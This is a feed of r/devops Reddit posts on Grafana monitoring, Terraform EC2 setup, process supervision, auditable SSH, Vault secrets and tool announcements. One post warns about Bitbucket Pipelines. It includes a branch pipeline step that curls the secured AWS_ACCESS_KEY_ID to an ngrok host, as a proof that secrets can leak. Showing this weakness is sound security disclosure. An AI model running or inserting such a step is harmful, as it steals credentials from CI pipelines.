Full monitoring in one place with Grafana and Kubernetes (100+ instances)
I have over 100 instances on AWS. I want full monitoring in one place - Kubernetes cluster with Grafana.
My question is: what do you think about generating dashboards (IaC) with CPU/RAM/IOPS usage views for that many instances?
Is it a good idea to use Helm for that, and then somehow switch values so that it can fetch data from other instances and create charts on a per-instance basis?
Perhaps one dashboard per metric, with one chart showing CPU usage for all instances, another for RAM, etc.?
What solutions worked for you in such a scenario?
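One pattern that often scales better than one dashboard per instance is a single dashboard with a templated `$instance` variable. If you do want to generate per-instance panels as code, a minimal sketch like the following builds the dashboard JSON programmatically (the metric and label names are assumptions based on Prometheus with node_exporter; adjust them to your exporters):

```python
import json

def build_dashboard(expr_template: str, title: str, instances: list[str]) -> dict:
    """Build a minimal Grafana dashboard dict with one panel per instance.

    `expr_template` is a PromQL expression containing the literal token
    $instance, which is substituted per panel. The metric name here is an
    assumption; replace it with whatever your exporters emit.
    """
    panels = []
    for i, inst in enumerate(instances):
        panels.append({
            "id": i + 1,
            "title": f"{title} - {inst}",
            "type": "timeseries",
            # lay panels out two per row
            "gridPos": {"h": 8, "w": 12, "x": 12 * (i % 2), "y": 8 * (i // 2)},
            "targets": [{"expr": expr_template.replace("$instance", inst)}],
        })
    return {"title": title, "schemaVersion": 30, "panels": panels}

dash = build_dashboard(
    'rate(node_cpu_seconds_total{instance="$instance",mode!="idle"}[5m])',
    "CPU usage",
    ["10.0.0.1:9100", "10.0.0.2:9100"],
)
dashboard_json = json.dumps(dash, indent=2)  # feed this to Grafana provisioning
```

Generating the JSON this way keeps the dashboards in version control, and the same function can be pointed at your real instance list from AWS.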
https://redd.it/ls0f9l
@r_devops
CKA/CKAD still worthwhile?
My company is offering to pay for my training and exams. I have no k8s experience, so I think I'm going to go for it, if for nothing else just to learn the tech. Just curious if these certs are actually held in high regard?
https://redd.it/lroeh7
@r_devops
Terraform EC2 post deploy configuration
Wondering if anyone can share their ideas on getting config files and installing packages onto new EC2 instances provisioned using Terraform.
Options considered:
- baking packages into the AMI and deploying config files to the EC2 instance using Terraform
- using Terraform to run post-deploy exec hooks (provisioners) on the EC2 instance
- using Ansible to deploy scripts and packages to the EC2 instance after deploy
These seem to be the only ways to keep the instance configuration located with the IaC package. I'm a little fuzzy on how I would execute these solutions, so any advice from anyone who has done this before (or thinks it's a good idea) would be useful.
I'd like to avoid deploying supporting resources like a Chef or Puppet server.
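For the Ansible option, one common glue step is turning `terraform output -json` into an Ansible inventory, so the same IaC repo drives both provisioning and configuration. A minimal sketch (the `instance_ips` output name is an assumption; rename it to match your Terraform configuration):

```python
import json

def inventory_from_tf_output(tf_output_json: str, group: str = "web") -> str:
    """Build a minimal Ansible INI inventory from `terraform output -json`.

    Assumes a Terraform output named `instance_ips` whose value is a list
    of reachable IPs; adapt the key to your own outputs.
    """
    outputs = json.loads(tf_output_json)
    ips = outputs["instance_ips"]["value"]
    lines = [f"[{group}]"] + ips
    return "\n".join(lines)

# Example: the JSON that `terraform output -json` would print.
sample = json.dumps({"instance_ips": {"value": ["10.0.0.5", "10.0.0.6"]}})
inventory = inventory_from_tf_output(sample)
```

You would then run `ansible-playbook -i <generated file> site.yml` after `terraform apply`, keeping the whole flow scriptable from CI.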
https://redd.it/lrniza
@r_devops
Terraform EC2 post configuration
Wondering if anyone can share their ideas on getting config files and installing packages onto new EC2 instances provisioned using Terraform.
Options considered:
- baking packages into the AMI and deploying config files to the EC2 instance using Terraform
- using Terraform to run post-deploy exec hooks (provisioners) on the EC2 instance
- using Ansible to deploy scripts and packages to the EC2 instance after deploy
These seem to be the only ways to keep the instance configuration located with the IaC package. I'm a little fuzzy on how I would execute these solutions, so any advice from anyone who has done this before (or thinks it's a good idea) would be useful.
I'd like to avoid deploying supporting resources like a Chef or Puppet server.
https://redd.it/lrmwgk
@r_devops
How do I manage several processes without containers?
Since it's 2021, the standard way of running several processes across a number of virtual machines is to run them in containers under Kubernetes. That enables automatic monitoring of the processes, failover, scaling, and all those good things.
But before containers were a thing (or even today, because containers and Kubernetes add a level of complexity that you may not want or need), how would you manage several running processes on a server cluster? Starting new processes on the machine with enough capacity, reporting if they fail, restarting, etc. -- there surely must be some tools for that, similar to what you get with Kubernetes but with standard Linux processes instead of containers.
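For plain Linux processes this is exactly what systemd (`Restart=on-failure`), supervisord, runit, or a scheduler like HashiCorp Nomad provide. The core restart loop those tools implement can be sketched in a few lines (a toy illustration to show the idea, not a replacement for them):

```python
import subprocess
import sys
import time

def supervise(cmd: list[str], max_restarts: int = 3, backoff: float = 0.0) -> str:
    """Re-run cmd whenever it exits non-zero, up to max_restarts times.

    A toy version of what systemd's Restart=on-failure or supervisord's
    autorestart give you; real supervisors also handle signals, logging,
    and exponential backoff.
    """
    restarts = 0
    while True:
        result = subprocess.run(cmd)
        if result.returncode == 0:
            return "exited cleanly"
        restarts += 1
        if restarts > max_restarts:
            return f"gave up after {max_restarts} restarts"
        time.sleep(backoff)  # crude fixed backoff before restarting

# A process that succeeds vs. one that keeps failing:
ok = supervise([sys.executable, "-c", "raise SystemExit(0)"])
bad = supervise([sys.executable, "-c", "raise SystemExit(1)"], max_restarts=2)
```

In practice the answer to "starting new processes on the machine with enough capacity" is the scheduler layer (Nomad does this for raw exec processes), while per-machine restart and reporting is the supervisor layer (systemd units, supervisord).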
https://redd.it/lrmfis
@r_devops
Auditable SSH access to server maintenance + Jenkins jobs
We deploy and manage services/servers for lots of different customers and we need to comply with new regulatory requirements for auditability.
For most of the "manual" maintenance tasks we can just use a bastion server with SSH session recording, automatic key assignment, directory auth, 2FA, all of that, no problem. But when it comes to the jobs going through Jenkins, things get cloudy.
We have a few Jenkins nodes (agents) around, but most of the deployments go through SSH (Ansible, rsync, etc.). We can't just apply the same rule here (who is going to type in a 2FA code every time a job runs? ;-), but at the very least we must be able to concentrate those accesses on the bastion and keep track of those activities as well, apart from the Jenkins or repository audit.
Is this something you guys have been through?
https://redd.it/lrlrt2
@r_devops
Azure DevOps lefthand menu. #HATEPOST
Please. Anyone.
Does anyone know how to stop the hover-over functionality of the left-hand navigation menu?
https://imgur.com/KMt0M9U
I keep accidentally taking my hand off my mouse, which then falls onto one of these icons; meanwhile I go to type and end up leaving the page without saving.
Fucking awful design.
https://redd.it/lsyyvx
@r_devops
(Free) Bitbucket pipelines can leak your credential
Lately I have been working with the free tier of Bitbucket Pipelines for my side project. The more I work with it, the more I see the pipeline as a security risk, especially in a repository with contractor-type devs.
So today I did some testing to confirm my hypothesis.
The project setup:
I have a repo with dev and main branches; these branches can only be merged to or written to with an admin account.
We have some credentials in `Repositories Variables` and some in `Deployment Variables`. One of them is AWS_ACCESS_KEY_ID, and we have already marked it as secured in the settings.
Since the bitbucket-pipelines.yml file can be changed in a feature branch, a developer can add a new pipeline rule that triggers the pipeline for that specific branch only.
For example:
```
definitions:
  steps:
    - step: &build-deploy

pipelines:
  branches:
    dev:
      - step:
          <<: *build-deploy
          deployment: staging
    master:
      - step:
          <<: *build-deploy
          deployment: production
    # start malicious changes
    test-hack-pipeline:
      - step:
          script:
            - >-
              curl --header "Content-Type: application/json"
              --request POST
              --data "{\"username\":\"${AWS_ACCESS_KEY_ID}\"}"
              https://9d756c9f91e2.ngrok.io
    # end malicious changes
```
With just a little bit of change, I can extract a Repository Variable. There is nothing to prevent me from extending that script to capture all the other environment variables.
In the case of `Deployment Variables`, those values can be protected by the premium feature called `Deployment permissions`, which lets us restrict deployment-variable access from unprotected branches.
So if you don't trust your devs, definitely upgrade to premium and move all credentials into `Deployment Variables`.
https://redd.it/lt5eic
@r_devops
For dev's looking for grants to develop apps around crypto
Just wanted to drop this here if anyone is interested. The Kin Foundation is offering grants to developers who want to join the Kin ecosystem through the Catalyst Fund. Why work for free when Kin will pay you and support you?
https://kin.org/catalyst-fund/
https://www.reddit.com/r/KinFoundation/
https://redd.it/lt9msx
@r_devops
Deep linking Question (in videos)
Hey, all! First time poster here. Please let me know if this is on the wrong board.
Do you guys happen to know of any meta documentation tools/platforms/plugins/etc.?
i.e. if someone were to search “marital issues” inside of our site/platform, our platform would allow us the ability to deep link into specific video timestamps where our video subjects would mention “marital issues” without playing the high-level video from the beginning.
Thanks in advance! 🙂
https://redd.it/ltatys
@r_devops
Assistance hashing out testing in CI/CD pipeline
I built this graphic primarily to help myself wrap my brain around how to implement testing in the CI/CD pipelines I'm building. Seeking assistance and input on it to see where I'm wrong, what is missing, what is / isn't necessary, etc.
https://imgur.com/a/6eMnVcd
https://imgur.com/a/PiQ9Kp0
My primary questions are the following:
1. The biggest one: Does this look right? Am I missing steps? Are any of them not necessary?
2. I really haven't quite wrapped my brain around how to do the integration testing. Really, just / and /api, and /admin and /api, need integration testing, but I'm not 100% sure how to go about this: docker-compose, another k8s cluster in a VM like the unit tests, etc.?
3. Any other suggestions?
I'm trying to implement good practices. Ours are currently... not great. We do have pipelines set up, but all of the testing is manual: test in dev, PR and deploy to staging, manual test in staging, PR and merge to production, manual testing of production.
My end goal is to have the PR trigger a pipeline to run tests and merge if they all pass, which triggers the deployment to production.
As always, I appreciate the help!
https://redd.it/lsytih
@r_devops
Alternate to AWS Fargate in Microsoft Azure
What is the alternative to AWS Fargate in Azure?
https://redd.it/lt3nf2
@r_devops
Docker like dedicated to Embedded System
Hi there! :)
I've just launched a new release of an open-source, real-time embedded software project named Luos.
Luos is like Docker, but dedicated to embedded systems. In other words, Luos is an open-source, real-time architecture for designing, testing, and deploying embedded applications.
It would be great if you could try it and give me some feedback (I really need feedback) ➔ https://docs.luos.io
Of course I'm here if you need help :D
https://redd.it/lt1h9x
@r_devops
Observability with infrastructure as code
I recently guest-wrote a post on Pulumi's website about using their Automation API to get much deeper insight into cloud resource creation.
I am currently using this with tooling where users can request foundational infrastructure through a web UI, which creates all the needed bits (e.g. VPC, peerings, flow logs, authentication, and optionally a basic environment of RDS, ECS, etc.), and as part of this process it takes generated credentials and stores them in a Vault instance. The issue I had was that when something failed to create, I had a hard time seeing what and why, and whether something was taking longer than usual (such as a security group deletion hanging around indefinitely).
The tech used is Pulumi and Honeycomb, but other providers could be used; it might just be more effort (e.g. parsing Terraform output to generate the spans).
https://www.pulumi.com/blog/observability-with-infrastructure-as-code/
https://redd.it/lswm6f
@r_devops
Dynatrace as a DevOps Tool
Does anyone use Dynatrace for DevOps? We are traditional DevOps and support the software, but we are also doing internal DevOps. I like the tool, and it does say it works well with ADO, but I am only seeing development uses, not necessarily DevOps uses. Any advice would be appreciated! (2 years in DevOps)
https://redd.it/lt0814
@r_devops
Manual actions that you wish were automated
First time poster here, so take it easy on me! While I'm not a developer myself, I work closely with a group of team members who are strongly focused on DevOps culture. I've spent quite some time recently researching why and how companies implement DevOps methodologies. While there's so much more for me to learn, the main concept I keep coming back to is automation: specifically, how important it is in bridging the gap between development and operations, and how it significantly improves delivery of features and functionality to customers.
I'm going to continue to engage with my team members on some of the questions below, but I'm curious to hear from a larger audience:
* What are some actions you take that you wish were automated?
* Are those actions related to the general delivery pipeline, troubleshooting, or generating regular feedback?
* What has prevented you or your team from automating those actions to reduce time and effort?
https://redd.it/lt010g
@r_devops
SigNoz - an open source alternative to DataDog
Hi everyone! Together with my brother I've been working on SigNoz for the past few months. It's built with React/TypeScript and Go, and based on Kafka and Druid underneath.
Here’s our GitHub repo: https://github.com/SigNoz/signoz
As of now, we have focused on providing a seamless experience between metrics and traces, and we plan to add logs in the coming months as OpenTelemetry logging matures (it's currently in alpha). SigNoz supports custom aggregates on filtered traces, and much more sophisticated filtering, since we use Druid underneath.
We recently released an initial version. We'd love any thoughts on whether this would be useful for you, or on how we can make it better for folks here.
https://redd.it/lsza5s
@r_devops
[Upcoming webinar] Using observability to scale AWS Lambda
In this 45-minute webinar we'll be discussing how to **utilize observability to optimize your Lambdas for scale and maintain their performance over time** - from development to production to scalability.
What you'll learn:
* How do you spot potentially **slow-running Lambda functions**, and how do you **power-tune them in development**?
* **Load testing**: why you need a **good observability** tool when you do load testing, and how to do load testing.
* How to use observability to **make crucial data available in production** and at scale.
* **Observability best practices** and common mistakes.
* SRE maintenance and **keeping your infrastructure performance healthy** in the long term.
Presenters: **Ben Ellerby** (AWS serverless hero and VP of engineering at Theodo), **Alexander White**, Full-Stack Mobile and Web Engineer at Theodo and **Taavi Rehemägi**, CEO and Co-Founder at Dashbird.
RSVP here: [https://sls.dashbird.io/lambda-observability-webinar](https://sls.dashbird.io/lambda-observability-webinar)
https://redd.it/ltjumi
@r_devops
Build k8s cluster from scratch, IaC and CI/CD choice?
Hi!
I'm involved in a startup and we are going to build a new k8s cluster with OpenShift Container Platform on IBM Cloud (don't ask why :D). The cluster will host databases, websites, mobile apps, and middle-layer apps developed with JavaScript, Java, and Python. In the future we will implement Kafka/event streams as well. My questions to you here:
1. What IaC tools would you use in order to manage the cluster? I've been looking into Terraform to manage the infrastructure.
2. What CI/CD tools would you use in order to connect GitHub with the Kubernetes cluster?
3. What monitoring and issue trackers do you have good experiences with?
4. What IaC tools, CI/CD tools, and other "DevOps" tools do you have bad experiences with? Just so I know what to watch out for. Could be cost related, bugs, features, functionality, etc.
All opinions are welcome. Thank you.
Best regards,
oscillate123
https://redd.it/lsyaj7
@r_devops
Chicken or the egg?
Teaching myself about DevOps, and I'm kind of stuck on a what-comes-first question. Say we consider, at a high level, an AWS infrastructure that's along the lines of:
* terraform managed instances
* ansible managing software installs
* kubernetes managing the microservices
* ci/cd using jenkins
* logging / metrics using elastic
It's my understanding that, in terms of setting this up:
Terraform will create all the instances (the masters, workers, Jenkins instance, etc.). Ansible will install and configure Kubernetes, Jenkins, and Elastic. Jenkins will then take charge of deploying all the services to Kubernetes.
Am I far off in my high-level overview? Is the order in which things would happen incorrect?
https://redd.it/lsopxk
@r_devops
Teaching myself about devops, and Im kind of stuck in a what comes first point of view. If we take a conversation at a high level of considering an aws infrastructure thats along the lines of:
* terraform managed instances
* ansible managing software installs
* kubernetes managing the microservices
* ci/cd using jenkins
* logging / metrics using elastic
Its my understanding, that in terms of setting this up:
terraform will create all the instances (the masters, workers, jenkins instance, etc). ansible will install / configure kubernetes, jenkins, elastic. jenkins will then take charge of deploying all the services to kubernetes.
Am i far off in my high level overview? Is the order of how things would happen incorrect?
https://redd.it/lsopxk
@r_devops
reddit
Chicken or the egg?
Teaching myself about devops, and Im kind of stuck in a what comes first point of view. If we take a conversation at a high level of considering...
How do you manage the secrets that your code needs from Hashicorp Vault?
I'm assuming your Vault instance already has a lot of secrets in separate folders. Now your code needs to fetch these secrets but not all of them. Suppose you need folder1/subfolder1/secret1/key1 and folder2/subfolder2/secret2/key2.
How do you keep these dependencies in your code? Do you have something like a my_dependencies.yml which is read by your code, and it queries based on that?
```
- requiredvaultsecrets:
    folder1:
      subfolder1:
        secret1:
          - key1
    folder2:
      subfolder2:
        secret2:
          - key2
```
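One way to make a spec like this actionable: flatten the nested mapping into (path, key) pairs, then read each one through the hvac client against a KV v2 mount. The spec layout and function names below are assumptions modeled on the example above:

```python
# Dependency spec as it might be loaded from my_dependencies.yml.
DEPS = {
    "folder1": {"subfolder1": {"secret1": ["key1"]}},
    "folder2": {"subfolder2": {"secret2": ["key2"]}},
}

def flatten(spec: dict, prefix: str = "") -> list[tuple[str, str]]:
    """Expand the nested dependency spec into (secret_path, key) pairs."""
    pairs = []
    for name, child in spec.items():
        path = f"{prefix}/{name}" if prefix else name
        if isinstance(child, dict):
            pairs.extend(flatten(child, path))
        else:  # leaf: a list of keys stored under this secret path
            pairs.extend((path, key) for key in child)
    return pairs

def fetch_all(pairs, vault_url="http://127.0.0.1:8200", token=None):
    """Read each (path, key) pair from a KV v2 mount via hvac."""
    import hvac  # pip install hvac
    client = hvac.Client(url=vault_url, token=token)
    secrets = {}
    for path, key in pairs:
        resp = client.secrets.kv.v2.read_secret_version(path=path)
        secrets[f"{path}/{key}"] = resp["data"]["data"][key]
    return secrets

pairs = flatten(DEPS)
```

Keeping the spec in one file means the code only ever requests the secrets it declares, which also makes it easy to audit what each service depends on.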
https://redd.it/lsmomy
@r_devops